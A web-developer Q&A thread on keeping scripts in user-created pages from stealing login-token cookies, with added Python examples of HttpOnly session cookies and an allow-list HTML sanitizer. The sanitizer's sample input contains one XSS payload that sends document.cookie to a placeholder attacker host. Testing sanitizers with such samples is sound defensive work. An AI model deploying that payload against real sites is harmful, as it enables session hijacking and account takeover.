1

I have a webpage, let's say that the page is called: http://www.mypage.this/

In my page users can create their own HTML pages and access them through www.mypage.this/(creator's_username)/(project_name). For instance, if my username is "USR" and my project is called "PROJECT" then the link is http://www.mypage.this/USR/PROJECT .

But there's a security problem...

I store people's login tokens as cookies. And what if some user's script has a function which reads the cookie and sends it to someone else?

They can get access to someone else's account. The token has to be saved as a cookie, because I need to verify the user in multiple pages. What should I do to prevent the user created scripts reading the tokens, yet still allow my pages to read the token?

Thank you in advance

*The tokens are of course regenerated every once in a while

To clear misunderstanding, I am NOT storing passwords in the user's side. I am storing a login cookie - a randomly generated string, re-generated on every login. And I store that on the user's side.

Tee-Tree

2 Answers

0

If you have to verify users in multiple pages, you should store login information in the session, not in the cookies. This way everything stays on your server, and only you can access it.

Cookies are made so that you can store information even when the user disconnects, leaves the browser or anything else.

Storing login information in cookies is generally a bad idea, as it's not really secure.

Bjornir
  • Thank you for the answer, but I have to store something on the user's side, for the user to be able to prove that the user IS that user. And I am not storing the user's password on the user's side, just the login token. And what do you mean "in the session"? A JS variable? – Tee-Tree Aug 29 '16 at 07:44
  • The session is server-side so you can't access it via JS. Ok, I misunderstood and thought you were also storing the password. I guess the best way to store the login token is by hashing it, that way you can check if the username is the one you stored it for, but it's impossible to retrieve the username from the hash. Just like you should do with a password. – Bjornir Aug 29 '16 at 07:51
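The pattern the answer and its comments describe (keep login state on the server, give the browser only an opaque random token, and store a hash of that token rather than the token itself) can be shown in a few lines. The following is an added example, not code from the question or either answer; it uses Python's standard library only, keeps the "session table" as an in-memory dict standing in for a real store, and the cookie name `login` is an assumption. The `HttpOnly` flag is what keeps `document.cookie` in a user-created page from reading the token at all, which is the asker's actual concern.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

COOKIE_NAME = "login"  # assumed cookie name; the question does not give one


def _digest(token: str) -> str:
    """Server stores only SHA-256(token), so a leaked session table is not a list of live logins."""
    return hashlib.sha256(token.encode("utf-8")).hexdigest()


def create_session(store: dict, username: str):
    """Mint a random opaque token, record its hash server-side,
    and return (token, value for the Set-Cookie response header)."""
    token = secrets.token_urlsafe(32)          # 256 bits of randomness, nothing derived from the user
    store[_digest(token)] = username           # the plain token never touches server storage
    cookie = SimpleCookie()
    cookie[COOKIE_NAME] = token
    cookie[COOKIE_NAME]["httponly"] = True     # JavaScript on any page cannot read it
    cookie[COOKIE_NAME]["secure"] = True       # browser only sends it over HTTPS
    cookie[COOKIE_NAME]["samesite"] = "Lax"    # not attached to cross-site POSTs
    cookie[COOKIE_NAME]["path"] = "/"
    return token, cookie[COOKIE_NAME].OutputString()


def resolve_session(store: dict, cookie_header: str):
    """Map an incoming Cookie request header to a username, or None if the token is absent or unknown."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get(COOKIE_NAME)
    if morsel is None:
        return None
    wanted = _digest(morsel.value)
    # Constant-time compare so lookup timing does not leak partial matches.
    for stored_digest, username in store.items():
        if hmac.compare_digest(stored_digest, wanted):
            return username
    return None


if __name__ == "__main__":
    sessions = {}                                  # constructed stand-in for a server-side store
    tok, set_cookie = create_session(sessions, "USR")
    print("Set-Cookie:", set_cookie)
    print("resolved:", resolve_session(sessions, f"{COOKIE_NAME}={tok}"))
```

On a real deployment the dict becomes a database or cache keyed by the digest, and logging out simply deletes that row; regenerating the token on every login, as the asker already does, is the same `create_session` call with the old digest removed.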
0

Oooh. You really don't want your users to be able to create pages that run scripts in other browsers. That creates a risk of cross-site scripting vulnerabilities (like the one you've mentioned here). Your safest bet is to start with blocking all SCRIPT tags. Then there are probably other things to block as well. This is something worth spending time reading about:

https://en.wikipedia.org/wiki/Cross-site_scripting

https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Tim Wright
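The answer's "start with blocking all SCRIPT tags, then there are probably other things to block as well" is the reason practitioners sanitize user HTML with an allow-list rather than a block-list: event-handler attributes (`onclick`, `onerror`) and `javascript:` URLs run code without any `<script>` tag. The following is an added example, not code from the question or the answer, written with Python's standard-library `html.parser`; the set of permitted tags and attributes is an assumption chosen for illustration, and a real site would tune it to what its pages need.

```python
from html import escape
from html.parser import HTMLParser

# Allow-list (assumed for this example): anything not listed is dropped.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "br", "h1", "h2", "h3", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style"}   # tag and everything inside it disappear
SAFE_SCHEMES = {"http", "https", "mailto"}


def _safe_url(value: str) -> bool:
    """Reject javascript:/data: style URLs, including ones padded with whitespace or control chars."""
    v = "".join(ch for ch in value if not ch.isspace() and ch.isprintable()).lower()
    if v.startswith(("/", "#", "?")) or ":" not in v:
        return True                        # relative reference: a scheme must start with a letter
    return v.split(":", 1)[0] in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    """Rebuilds the document from the parse events, emitting only allow-listed markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0               # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if self._skip_depth:
            if tag in DROP_WITH_CONTENT:
                self._skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self._skip_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return                         # unknown tag is dropped, its text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                   # this is what removes onclick=, onerror=, style= ...
            if name in ("href", "src") and not _safe_url(value or ""):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skip_depth:
            if tag in DROP_WITH_CONTENT:
                self._skip_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))   # text is re-escaped, never passed raw

    # comments, processing instructions and declarations use the base-class no-op handlers


def sanitize(user_html: str) -> str:
    """Return the allow-listed subset of user_html as a string safe to embed in a page."""
    parser = Sanitizer()
    parser.feed(user_html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample of the kind of page a user might upload.
    sample = ('<h1>My project</h1><p onclick="x()">hello</p>'
              '<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script>'
              '<a href="javascript:alert(1)">link</a><img src="/pic.png" onerror="evil()">')
    print(sanitize(sample))
```

Because the parser emits a fresh document instead of editing the original string, malformed or deliberately nested markup cannot smuggle a tag past a regex; combined with an `HttpOnly` login cookie, a user page that slips through still cannot read the token.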